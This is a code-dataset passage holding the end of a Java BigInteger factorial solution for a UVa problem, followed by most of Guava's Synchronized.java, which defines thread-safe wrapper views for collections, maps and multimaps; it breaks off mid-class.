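// the BigInteger result, e.g. product.toString().length() is 7 for 10! (3628800) and, as the
// statement claims, 1135 for 500!.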
import java.math.BigInteger;
import java.util.Scanner;
public class FiveHundredFactorial {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
while (input.hasNext()) {
int number = input.nextInt();
BigInteger product = BigInteger.ONE;
for (int i = 2; i < number + 1; i++) {
product = product.multiply(BigInteger.valueOf(i));
}
System.out.println(number + "!\n" + product);
}
}
}
| kdn251/interviews | uva/FiveHundredFactorial.java |
1,171 | /*
* Copyright (C) 2007 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.base.Preconditions.checkNotNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.j2objc.annotations.RetainedWith;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Collection;
import java.util.Comparator;
import java.util.Deque;
import java.util.Iterator;
import java.util.List;
import java.util.ListIterator;
import java.util.Map;
import java.util.NavigableMap;
import java.util.NavigableSet;
import java.util.Queue;
import java.util.RandomAccess;
import java.util.Set;
import java.util.SortedMap;
import java.util.SortedSet;
import javax.annotation.CheckForNull;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* Synchronized collection views. The returned synchronized collection views are serializable if the
* backing collection and the mutex are serializable.
*
* <p>If {@code null} is passed as the {@code mutex} parameter to any of this class's top-level
* methods or inner class constructors, the created object uses itself as the synchronization mutex.
*
* <p>This class should be used by other collection classes only.
*
* @author Mike Bostock
* @author Jared Levy
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
/*
* I have decided not to bother adding @ParametricNullness annotations in this class. Adding them is
* a lot of busy work, and the annotation matters only when the APIs to be annotated are visible to
* Kotlin code. In this class, nothing is publicly visible (nor exposed indirectly through a
* publicly visible subclass), and I doubt any of our current or future Kotlin extensions for the
* package will refer to the class. Plus, @ParametricNullness is only a temporary workaround,
* anyway, so we just need to get by without the annotations here until Kotlin better understands
* our other nullness annotations.
*/
final class Synchronized {
private Synchronized() {}
static class SynchronizedObject implements Serializable {
final Object delegate;
final Object mutex;
SynchronizedObject(Object delegate, @CheckForNull Object mutex) {
this.delegate = checkNotNull(delegate);
this.mutex = (mutex == null) ? this : mutex;
}
Object delegate() {
return delegate;
}
// No equals and hashCode; see ForwardingObject for details.
@Override
public String toString() {
synchronized (mutex) {
return delegate.toString();
}
}
// Serialization invokes writeObject only when it's private.
// The SynchronizedObject subclasses don't need a writeObject method since
// they don't contain any non-transient member variables, while the
// following writeObject() handles the SynchronizedObject members.
@GwtIncompatible // java.io.ObjectOutputStream
@J2ktIncompatible
private void writeObject(ObjectOutputStream stream) throws IOException {
synchronized (mutex) {
stream.defaultWriteObject();
}
}
@GwtIncompatible // not needed in emulated source
@J2ktIncompatible
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> Collection<E> collection(
Collection<E> collection, @CheckForNull Object mutex) {
return new SynchronizedCollection<>(collection, mutex);
}
@VisibleForTesting
static class SynchronizedCollection<E extends @Nullable Object> extends SynchronizedObject
implements Collection<E> {
private SynchronizedCollection(Collection<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked")
@Override
Collection<E> delegate() {
return (Collection<E>) super.delegate();
}
@Override
public boolean add(E e) {
synchronized (mutex) {
return delegate().add(e);
}
}
@Override
public boolean addAll(Collection<? extends E> c) {
synchronized (mutex) {
return delegate().addAll(c);
}
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
public boolean contains(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().contains(o);
}
}
@Override
public boolean containsAll(Collection<?> c) {
synchronized (mutex) {
return delegate().containsAll(c);
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public Iterator<E> iterator() {
return delegate().iterator(); // manually synchronized
}
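    // Illustrative note (not part of the original source): as with the JDK's
    // Collections.synchronizedCollection, the caller is expected to synchronize manually while
    // iterating, typically on the returned view (which is the mutex when none was supplied), e.g.
    //   synchronized (syncedCollection) {
    //     for (Object o : syncedCollection) { /* ... */ }
    //   }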
@Override
public boolean remove(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().remove(o);
}
}
@Override
public boolean removeAll(Collection<?> c) {
synchronized (mutex) {
return delegate().removeAll(c);
}
}
@Override
public boolean retainAll(Collection<?> c) {
synchronized (mutex) {
return delegate().retainAll(c);
}
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public @Nullable Object[] toArray() {
synchronized (mutex) {
return delegate().toArray();
}
}
@Override
@SuppressWarnings("nullness") // b/192354773 in our checker affects toArray declarations
public <T extends @Nullable Object> T[] toArray(T[] a) {
synchronized (mutex) {
return delegate().toArray(a);
}
}
private static final long serialVersionUID = 0;
}
@VisibleForTesting
static <E extends @Nullable Object> Set<E> set(Set<E> set, @CheckForNull Object mutex) {
return new SynchronizedSet<>(set, mutex);
}
static class SynchronizedSet<E extends @Nullable Object> extends SynchronizedCollection<E>
implements Set<E> {
SynchronizedSet(Set<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Set<E> delegate() {
return (Set<E>) super.delegate();
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> SortedSet<E> sortedSet(
SortedSet<E> set, @CheckForNull Object mutex) {
return new SynchronizedSortedSet<>(set, mutex);
}
static class SynchronizedSortedSet<E extends @Nullable Object> extends SynchronizedSet<E>
implements SortedSet<E> {
SynchronizedSortedSet(SortedSet<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SortedSet<E> delegate() {
return (SortedSet<E>) super.delegate();
}
@Override
@CheckForNull
public Comparator<? super E> comparator() {
synchronized (mutex) {
return delegate().comparator();
}
}
@Override
public SortedSet<E> subSet(E fromElement, E toElement) {
synchronized (mutex) {
return sortedSet(delegate().subSet(fromElement, toElement), mutex);
}
}
@Override
public SortedSet<E> headSet(E toElement) {
synchronized (mutex) {
return sortedSet(delegate().headSet(toElement), mutex);
}
}
@Override
public SortedSet<E> tailSet(E fromElement) {
synchronized (mutex) {
return sortedSet(delegate().tailSet(fromElement), mutex);
}
}
@Override
public E first() {
synchronized (mutex) {
return delegate().first();
}
}
@Override
public E last() {
synchronized (mutex) {
return delegate().last();
}
}
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> List<E> list(
List<E> list, @CheckForNull Object mutex) {
return (list instanceof RandomAccess)
? new SynchronizedRandomAccessList<E>(list, mutex)
: new SynchronizedList<E>(list, mutex);
}
static class SynchronizedList<E extends @Nullable Object> extends SynchronizedCollection<E>
implements List<E> {
SynchronizedList(List<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
List<E> delegate() {
return (List<E>) super.delegate();
}
@Override
public void add(int index, E element) {
synchronized (mutex) {
delegate().add(index, element);
}
}
@Override
public boolean addAll(int index, Collection<? extends E> c) {
synchronized (mutex) {
return delegate().addAll(index, c);
}
}
@Override
public E get(int index) {
synchronized (mutex) {
return delegate().get(index);
}
}
@Override
public int indexOf(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().indexOf(o);
}
}
@Override
public int lastIndexOf(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().lastIndexOf(o);
}
}
@Override
public ListIterator<E> listIterator() {
return delegate().listIterator(); // manually synchronized
}
@Override
public ListIterator<E> listIterator(int index) {
return delegate().listIterator(index); // manually synchronized
}
@Override
public E remove(int index) {
synchronized (mutex) {
return delegate().remove(index);
}
}
@Override
public E set(int index, E element) {
synchronized (mutex) {
return delegate().set(index, element);
}
}
@Override
public List<E> subList(int fromIndex, int toIndex) {
synchronized (mutex) {
return list(delegate().subList(fromIndex, toIndex), mutex);
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static final class SynchronizedRandomAccessList<E extends @Nullable Object>
extends SynchronizedList<E> implements RandomAccess {
SynchronizedRandomAccessList(List<E> list, @CheckForNull Object mutex) {
super(list, mutex);
}
private static final long serialVersionUID = 0;
}
static <E extends @Nullable Object> Multiset<E> multiset(
Multiset<E> multiset, @CheckForNull Object mutex) {
if (multiset instanceof SynchronizedMultiset || multiset instanceof ImmutableMultiset) {
return multiset;
}
return new SynchronizedMultiset<>(multiset, mutex);
}
static final class SynchronizedMultiset<E extends @Nullable Object>
extends SynchronizedCollection<E> implements Multiset<E> {
@CheckForNull transient Set<E> elementSet;
@CheckForNull transient Set<Multiset.Entry<E>> entrySet;
SynchronizedMultiset(Multiset<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Multiset<E> delegate() {
return (Multiset<E>) super.delegate();
}
@Override
public int count(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().count(o);
}
}
@Override
public int add(@ParametricNullness E e, int n) {
synchronized (mutex) {
return delegate().add(e, n);
}
}
@Override
public int remove(@CheckForNull Object o, int n) {
synchronized (mutex) {
return delegate().remove(o, n);
}
}
@Override
public int setCount(@ParametricNullness E element, int count) {
synchronized (mutex) {
return delegate().setCount(element, count);
}
}
@Override
public boolean setCount(@ParametricNullness E element, int oldCount, int newCount) {
synchronized (mutex) {
return delegate().setCount(element, oldCount, newCount);
}
}
@Override
public Set<E> elementSet() {
synchronized (mutex) {
if (elementSet == null) {
elementSet = typePreservingSet(delegate().elementSet(), mutex);
}
return elementSet;
}
}
@Override
public Set<Multiset.Entry<E>> entrySet() {
synchronized (mutex) {
if (entrySet == null) {
entrySet = typePreservingSet(delegate().entrySet(), mutex);
}
return entrySet;
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> Multimap<K, V> multimap(
Multimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedMultimap || multimap instanceof BaseImmutableMultimap) {
return multimap;
}
return new SynchronizedMultimap<>(multimap, mutex);
}
static class SynchronizedMultimap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Multimap<K, V> {
@CheckForNull transient Set<K> keySet;
@CheckForNull transient Collection<V> valuesCollection;
@CheckForNull transient Collection<Map.Entry<K, V>> entries;
@CheckForNull transient Map<K, Collection<V>> asMap;
@CheckForNull transient Multiset<K> keys;
@SuppressWarnings("unchecked")
@Override
Multimap<K, V> delegate() {
return (Multimap<K, V>) super.delegate();
}
SynchronizedMultimap(Multimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public boolean containsKey(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().containsKey(key);
}
}
@Override
public boolean containsValue(@CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsValue(value);
}
}
@Override
public boolean containsEntry(@CheckForNull Object key, @CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsEntry(key, value);
}
}
@Override
public Collection<V> get(@ParametricNullness K key) {
synchronized (mutex) {
return typePreservingCollection(delegate().get(key), mutex);
}
}
@Override
public boolean put(@ParametricNullness K key, @ParametricNullness V value) {
synchronized (mutex) {
return delegate().put(key, value);
}
}
@Override
public boolean putAll(@ParametricNullness K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().putAll(key, values);
}
}
@Override
public boolean putAll(Multimap<? extends K, ? extends V> multimap) {
synchronized (mutex) {
return delegate().putAll(multimap);
}
}
@Override
public Collection<V> replaceValues(@ParametricNullness K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
@Override
public boolean remove(@CheckForNull Object key, @CheckForNull Object value) {
synchronized (mutex) {
return delegate().remove(key, value);
}
}
@Override
public Collection<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
public Set<K> keySet() {
synchronized (mutex) {
if (keySet == null) {
keySet = typePreservingSet(delegate().keySet(), mutex);
}
return keySet;
}
}
@Override
public Collection<V> values() {
synchronized (mutex) {
if (valuesCollection == null) {
valuesCollection = collection(delegate().values(), mutex);
}
return valuesCollection;
}
}
@Override
public Collection<Map.Entry<K, V>> entries() {
synchronized (mutex) {
if (entries == null) {
entries = typePreservingCollection(delegate().entries(), mutex);
}
return entries;
}
}
@Override
public Map<K, Collection<V>> asMap() {
synchronized (mutex) {
if (asMap == null) {
asMap = new SynchronizedAsMap<>(delegate().asMap(), mutex);
}
return asMap;
}
}
@Override
public Multiset<K> keys() {
synchronized (mutex) {
if (keys == null) {
keys = multiset(delegate().keys(), mutex);
}
return keys;
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> ListMultimap<K, V> listMultimap(
ListMultimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedListMultimap || multimap instanceof BaseImmutableMultimap) {
return multimap;
}
return new SynchronizedListMultimap<>(multimap, mutex);
}
static final class SynchronizedListMultimap<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMultimap<K, V> implements ListMultimap<K, V> {
SynchronizedListMultimap(ListMultimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
ListMultimap<K, V> delegate() {
return (ListMultimap<K, V>) super.delegate();
}
@Override
public List<V> get(K key) {
synchronized (mutex) {
return list(delegate().get(key), mutex);
}
}
@Override
public List<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public List<V> replaceValues(K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> SetMultimap<K, V> setMultimap(
SetMultimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedSetMultimap || multimap instanceof BaseImmutableMultimap) {
return multimap;
}
return new SynchronizedSetMultimap<>(multimap, mutex);
}
static class SynchronizedSetMultimap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMultimap<K, V> implements SetMultimap<K, V> {
@CheckForNull transient Set<Map.Entry<K, V>> entrySet;
SynchronizedSetMultimap(SetMultimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SetMultimap<K, V> delegate() {
return (SetMultimap<K, V>) super.delegate();
}
@Override
public Set<V> get(K key) {
synchronized (mutex) {
return set(delegate().get(key), mutex);
}
}
@Override
public Set<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public Set<V> replaceValues(K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
@Override
public Set<Map.Entry<K, V>> entries() {
synchronized (mutex) {
if (entrySet == null) {
entrySet = set(delegate().entries(), mutex);
}
return entrySet;
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object>
SortedSetMultimap<K, V> sortedSetMultimap(
SortedSetMultimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedSortedSetMultimap) {
return multimap;
}
return new SynchronizedSortedSetMultimap<>(multimap, mutex);
}
static final class SynchronizedSortedSetMultimap<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedSetMultimap<K, V> implements SortedSetMultimap<K, V> {
SynchronizedSortedSetMultimap(SortedSetMultimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SortedSetMultimap<K, V> delegate() {
return (SortedSetMultimap<K, V>) super.delegate();
}
@Override
public SortedSet<V> get(K key) {
synchronized (mutex) {
return sortedSet(delegate().get(key), mutex);
}
}
@Override
public SortedSet<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public SortedSet<V> replaceValues(K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
@Override
@CheckForNull
public Comparator<? super V> valueComparator() {
synchronized (mutex) {
return delegate().valueComparator();
}
}
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> Collection<E> typePreservingCollection(
Collection<E> collection, @CheckForNull Object mutex) {
if (collection instanceof SortedSet) {
return sortedSet((SortedSet<E>) collection, mutex);
}
if (collection instanceof Set) {
return set((Set<E>) collection, mutex);
}
if (collection instanceof List) {
return list((List<E>) collection, mutex);
}
return collection(collection, mutex);
}
private static <E extends @Nullable Object> Set<E> typePreservingSet(
Set<E> set, @CheckForNull Object mutex) {
if (set instanceof SortedSet) {
return sortedSet((SortedSet<E>) set, mutex);
} else {
return set(set, mutex);
}
}
static final class SynchronizedAsMapEntries<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedSet<Map.Entry<K, Collection<V>>> {
SynchronizedAsMapEntries(
Set<Map.Entry<K, Collection<V>>> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
public Iterator<Map.Entry<K, Collection<V>>> iterator() {
// Must be manually synchronized.
return new TransformedIterator<Map.Entry<K, Collection<V>>, Map.Entry<K, Collection<V>>>(
super.iterator()) {
@Override
Map.Entry<K, Collection<V>> transform(final Map.Entry<K, Collection<V>> entry) {
return new ForwardingMapEntry<K, Collection<V>>() {
@Override
protected Map.Entry<K, Collection<V>> delegate() {
return entry;
}
@Override
public Collection<V> getValue() {
return typePreservingCollection(entry.getValue(), mutex);
}
};
}
};
}
// See Collections.CheckedMap.CheckedEntrySet for details on attacks.
@Override
public @Nullable Object[] toArray() {
synchronized (mutex) {
/*
* toArrayImpl returns `@Nullable Object[]` rather than `Object[]` but only because it can
* be used with collections that may contain null. This collection never contains nulls, so
* we could return `Object[]`. But this class is private and J2KT cannot change return types
* in overrides, so we declare `@Nullable Object[]` as the return type.
*/
return ObjectArrays.toArrayImpl(delegate());
}
}
@Override
@SuppressWarnings("nullness") // b/192354773 in our checker affects toArray declarations
public <T extends @Nullable Object> T[] toArray(T[] array) {
synchronized (mutex) {
return ObjectArrays.toArrayImpl(delegate(), array);
}
}
@Override
public boolean contains(@CheckForNull Object o) {
synchronized (mutex) {
return Maps.containsEntryImpl(delegate(), o);
}
}
@Override
public boolean containsAll(Collection<?> c) {
synchronized (mutex) {
return Collections2.containsAllImpl(delegate(), c);
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return Sets.equalsImpl(delegate(), o);
}
}
@Override
public boolean remove(@CheckForNull Object o) {
synchronized (mutex) {
return Maps.removeEntryImpl(delegate(), o);
}
}
@Override
public boolean removeAll(Collection<?> c) {
synchronized (mutex) {
return Iterators.removeAll(delegate().iterator(), c);
}
}
@Override
public boolean retainAll(Collection<?> c) {
synchronized (mutex) {
return Iterators.retainAll(delegate().iterator(), c);
}
}
private static final long serialVersionUID = 0;
}
@VisibleForTesting
static <K extends @Nullable Object, V extends @Nullable Object> Map<K, V> map(
Map<K, V> map, @CheckForNull Object mutex) {
return new SynchronizedMap<>(map, mutex);
}
static class SynchronizedMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Map<K, V> {
@CheckForNull transient Set<K> keySet;
@CheckForNull transient Collection<V> values;
@CheckForNull transient Set<Map.Entry<K, V>> entrySet;
SynchronizedMap(Map<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked")
@Override
Map<K, V> delegate() {
return (Map<K, V>) super.delegate();
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
public boolean containsKey(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().containsKey(key);
}
}
@Override
public boolean containsValue(@CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsValue(value);
}
}
@Override
public Set<Map.Entry<K, V>> entrySet() {
synchronized (mutex) {
if (entrySet == null) {
entrySet = set(delegate().entrySet(), mutex);
}
return entrySet;
}
}
@Override
@CheckForNull
public V get(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().get(key);
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public Set<K> keySet() {
synchronized (mutex) {
if (keySet == null) {
keySet = set(delegate().keySet(), mutex);
}
return keySet;
}
}
@Override
@CheckForNull
public V put(K key, V value) {
synchronized (mutex) {
return delegate().put(key, value);
}
}
@Override
public void putAll(Map<? extends K, ? extends V> map) {
synchronized (mutex) {
delegate().putAll(map);
}
}
@Override
@CheckForNull
public V remove(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().remove(key);
}
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public Collection<V> values() {
synchronized (mutex) {
if (values == null) {
values = collection(delegate().values(), mutex);
}
return values;
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> SortedMap<K, V> sortedMap(
SortedMap<K, V> sortedMap, @CheckForNull Object mutex) {
return new SynchronizedSortedMap<>(sortedMap, mutex);
}
static class SynchronizedSortedMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMap<K, V> implements SortedMap<K, V> {
SynchronizedSortedMap(SortedMap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SortedMap<K, V> delegate() {
return (SortedMap<K, V>) super.delegate();
}
@Override
@CheckForNull
public Comparator<? super K> comparator() {
synchronized (mutex) {
return delegate().comparator();
}
}
@Override
public K firstKey() {
synchronized (mutex) {
return delegate().firstKey();
}
}
@Override
public SortedMap<K, V> headMap(K toKey) {
synchronized (mutex) {
return sortedMap(delegate().headMap(toKey), mutex);
}
}
@Override
public K lastKey() {
synchronized (mutex) {
return delegate().lastKey();
}
}
@Override
public SortedMap<K, V> subMap(K fromKey, K toKey) {
synchronized (mutex) {
return sortedMap(delegate().subMap(fromKey, toKey), mutex);
}
}
@Override
public SortedMap<K, V> tailMap(K fromKey) {
synchronized (mutex) {
return sortedMap(delegate().tailMap(fromKey), mutex);
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> BiMap<K, V> biMap(
BiMap<K, V> bimap, @CheckForNull Object mutex) {
if (bimap instanceof SynchronizedBiMap || bimap instanceof ImmutableBiMap) {
return bimap;
}
return new SynchronizedBiMap<>(bimap, mutex, null);
}
static final class SynchronizedBiMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMap<K, V> implements BiMap<K, V>, Serializable {
@CheckForNull private transient Set<V> valueSet;
@RetainedWith @CheckForNull private transient BiMap<V, K> inverse;
private SynchronizedBiMap(
BiMap<K, V> delegate, @CheckForNull Object mutex, @CheckForNull BiMap<V, K> inverse) {
super(delegate, mutex);
this.inverse = inverse;
}
@Override
BiMap<K, V> delegate() {
return (BiMap<K, V>) super.delegate();
}
@Override
public Set<V> values() {
synchronized (mutex) {
if (valueSet == null) {
valueSet = set(delegate().values(), mutex);
}
return valueSet;
}
}
@Override
@CheckForNull
public V forcePut(@ParametricNullness K key, @ParametricNullness V value) {
synchronized (mutex) {
return delegate().forcePut(key, value);
}
}
@Override
public BiMap<V, K> inverse() {
synchronized (mutex) {
if (inverse == null) {
inverse = new SynchronizedBiMap<>(delegate().inverse(), mutex, this);
}
return inverse;
}
}
private static final long serialVersionUID = 0;
}
static final class SynchronizedAsMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMap<K, Collection<V>> {
@CheckForNull transient Set<Map.Entry<K, Collection<V>>> asMapEntrySet;
@CheckForNull transient Collection<Collection<V>> asMapValues;
SynchronizedAsMap(Map<K, Collection<V>> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
@CheckForNull
public Collection<V> get(@CheckForNull Object key) {
synchronized (mutex) {
Collection<V> collection = super.get(key);
return (collection == null) ? null : typePreservingCollection(collection, mutex);
}
}
@Override
public Set<Map.Entry<K, Collection<V>>> entrySet() {
synchronized (mutex) {
if (asMapEntrySet == null) {
asMapEntrySet = new SynchronizedAsMapEntries<>(delegate().entrySet(), mutex);
}
return asMapEntrySet;
}
}
@Override
public Collection<Collection<V>> values() {
synchronized (mutex) {
if (asMapValues == null) {
asMapValues = new SynchronizedAsMapValues<V>(delegate().values(), mutex);
}
return asMapValues;
}
}
@Override
public boolean containsValue(@CheckForNull Object o) {
// values() and its contains() method are both synchronized.
return values().contains(o);
}
private static final long serialVersionUID = 0;
}
static final class SynchronizedAsMapValues<V extends @Nullable Object>
extends SynchronizedCollection<Collection<V>> {
SynchronizedAsMapValues(Collection<Collection<V>> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
public Iterator<Collection<V>> iterator() {
// Must be manually synchronized.
return new TransformedIterator<Collection<V>, Collection<V>>(super.iterator()) {
@Override
Collection<V> transform(Collection<V> from) {
return typePreservingCollection(from, mutex);
}
};
}
private static final long serialVersionUID = 0;
}
@GwtIncompatible // NavigableSet
@VisibleForTesting
static final class SynchronizedNavigableSet<E extends @Nullable Object>
extends SynchronizedSortedSet<E> implements NavigableSet<E> {
SynchronizedNavigableSet(NavigableSet<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
NavigableSet<E> delegate() {
return (NavigableSet<E>) super.delegate();
}
@Override
@CheckForNull
public E ceiling(E e) {
synchronized (mutex) {
return delegate().ceiling(e);
}
}
@Override
public Iterator<E> descendingIterator() {
return delegate().descendingIterator(); // manually synchronized
}
@CheckForNull transient NavigableSet<E> descendingSet;
@Override
public NavigableSet<E> descendingSet() {
synchronized (mutex) {
if (descendingSet == null) {
NavigableSet<E> dS = Synchronized.navigableSet(delegate().descendingSet(), mutex);
descendingSet = dS;
return dS;
}
return descendingSet;
}
}
@Override
@CheckForNull
public E floor(E e) {
synchronized (mutex) {
return delegate().floor(e);
}
}
@Override
public NavigableSet<E> headSet(E toElement, boolean inclusive) {
synchronized (mutex) {
return Synchronized.navigableSet(delegate().headSet(toElement, inclusive), mutex);
}
}
@Override
public SortedSet<E> headSet(E toElement) {
return headSet(toElement, false);
}
@Override
@CheckForNull
public E higher(E e) {
synchronized (mutex) {
return delegate().higher(e);
}
}
@Override
@CheckForNull
public E lower(E e) {
synchronized (mutex) {
return delegate().lower(e);
}
}
@Override
@CheckForNull
public E pollFirst() {
synchronized (mutex) {
return delegate().pollFirst();
}
}
@Override
@CheckForNull
public E pollLast() {
synchronized (mutex) {
return delegate().pollLast();
}
}
@Override
public NavigableSet<E> subSet(
E fromElement, boolean fromInclusive, E toElement, boolean toInclusive) {
synchronized (mutex) {
return Synchronized.navigableSet(
delegate().subSet(fromElement, fromInclusive, toElement, toInclusive), mutex);
}
}
@Override
public SortedSet<E> subSet(E fromElement, E toElement) {
return subSet(fromElement, true, toElement, false);
}
@Override
public NavigableSet<E> tailSet(E fromElement, boolean inclusive) {
synchronized (mutex) {
return Synchronized.navigableSet(delegate().tailSet(fromElement, inclusive), mutex);
}
}
@Override
public SortedSet<E> tailSet(E fromElement) {
return tailSet(fromElement, true);
}
private static final long serialVersionUID = 0;
}
@GwtIncompatible // NavigableSet
static <E extends @Nullable Object> NavigableSet<E> navigableSet(
NavigableSet<E> navigableSet, @CheckForNull Object mutex) {
return new SynchronizedNavigableSet<>(navigableSet, mutex);
}
@GwtIncompatible // NavigableSet
static <E extends @Nullable Object> NavigableSet<E> navigableSet(NavigableSet<E> navigableSet) {
return navigableSet(navigableSet, null);
}
@GwtIncompatible // NavigableMap
static <K extends @Nullable Object, V extends @Nullable Object> NavigableMap<K, V> navigableMap(
NavigableMap<K, V> navigableMap) {
return navigableMap(navigableMap, null);
}
@GwtIncompatible // NavigableMap
static <K extends @Nullable Object, V extends @Nullable Object> NavigableMap<K, V> navigableMap(
NavigableMap<K, V> navigableMap, @CheckForNull Object mutex) {
return new SynchronizedNavigableMap<>(navigableMap, mutex);
}
@GwtIncompatible // NavigableMap
@VisibleForTesting
static final class SynchronizedNavigableMap<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedSortedMap<K, V> implements NavigableMap<K, V> {
SynchronizedNavigableMap(NavigableMap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
